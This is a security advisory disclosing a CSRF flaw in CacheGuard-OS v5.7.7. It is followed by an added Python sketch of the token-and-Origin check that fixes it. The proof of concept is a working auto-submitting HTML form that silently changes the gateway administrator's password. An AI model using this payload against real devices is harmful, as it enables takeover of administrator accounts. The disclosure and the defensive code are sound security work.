I. VULNERABILITY
-------------------------
CSRF vulnerabilities in CacheGuard-OS v5.7.7

II. BACKGROUND
-------------------------
CacheGuard is an All-in-One Web Security Gateway providing firewall, web antivirus, caching, compression, URL filtering, proxy, high availability, content filtering, bandwidth saving, bandwidth shaping, Quality of Service and more.

III. DESCRIPTION
-------------------------
A CSRF vulnerability has been detected in CacheGuard in "/gui/password-wadmin.apl".

IV. PROOF OF CONCEPT
-------------------------
The application does not validate any csrf_token parameter on "/gui/password-wadmin.apl".

<html>
<body onload="CSRF.submit();">
<br>
<br>
<form id="CSRF" action="https://10.200.210.123:8090/gui/password-wadmin.apl" method="post" name="CSRF">
<input name="password1" value="admin@1234" type=hidden> </input>
<input name="password2" value="admin@1234" type=hidden> </input>
</form>
</body>
</html>

V. BUSINESS IMPACT
-------------------------
CSRF allows attackers to modify settings or change the password of the administrator user in CacheGuard, because these functions are not protected by CSRF tokens.

VI. REQUIREMENTS
-----------------------
An attacker needs to know the IP of the device.
An administrator needs an authenticated connection to the device.

VII. SYSTEMS AFFECTED
-------------------------
CacheGuard-OS v5.7.7

VIII. SOLUTION
-------------------------
All functions must be protected by CSRF tokens.

http://www.kb.cert.org/vuls/id/241508

By William Costa
william.costa no spam gmail.com
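The check the Solution section calls for, as an added Python sketch that is not part of the original advisory and not CacheGuard's code: a session-bound CSRF token plus an Origin check in front of a password-change handler. The function names, `SERVER_KEY`, the `GUI_ORIGIN` value and the sample requests are assumptions constructed for illustration.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

SERVER_KEY = secrets.token_bytes(32)         # per-deployment secret (assumption)
GUI_ORIGIN = "https://gateway.example:8090"  # constructed admin GUI origin

def issue_csrf_token(session_id: str) -> str:
    """Token the server embeds as a hidden field in the password form."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()

def same_origin(headers: dict, expected: str = GUI_ORIGIN) -> bool:
    """True only when Origin (or Referer as fallback) names the GUI itself."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False
    parts = urlsplit(source)
    return f"{parts.scheme}://{parts.netloc}" == expected

def check_password_change(session_id: str, headers: dict, form: dict):
    """Return (allowed, reason) for a POST to the password-change handler."""
    if not same_origin(headers):
        return False, "cross-origin request"
    supplied = form.get("csrf_token", "").encode()
    expected = issue_csrf_token(session_id).encode()
    if not hmac.compare_digest(supplied, expected):  # constant-time compare
        return False, "missing or invalid csrf_token"
    if form.get("password1") != form.get("password2"):
        return False, "passwords do not match"
    return True, "ok"

# Constructed sample requests, all arriving with the admin's session cookie.
ADMIN_SESSION = "sess-admin-0001"
# Shape of the advisory's auto-submitting form: foreign Origin, no token.
FORGED = ({"Origin": "https://attacker.example"},
          {"password1": "x", "password2": "x"})
# Same-origin request that still lacks the token (e.g. a stale form).
NO_TOKEN = ({"Origin": GUI_ORIGIN}, {"password1": "x", "password2": "x"})
# Token minted for a different session must not validate.
WRONG_SESSION = ({"Origin": GUI_ORIGIN},
                 {"password1": "x", "password2": "x",
                  "csrf_token": issue_csrf_token("sess-other-0002")})
# Form rendered by the GUI itself for this session.
LEGIT = ({"Origin": GUI_ORIGIN},
         {"password1": "x", "password2": "x",
          "csrf_token": issue_csrf_token(ADMIN_SESSION)})

if __name__ == "__main__":
    for name, (hdrs, form) in [("forged", FORGED), ("no token", NO_TOKEN),
                               ("wrong session", WRONG_SESSION), ("legit", LEGIT)]:
        print(name, check_password_change(ADMIN_SESSION, hdrs, form))
```

Requiring the current password in the same form is a common additional control on password-change endpoints.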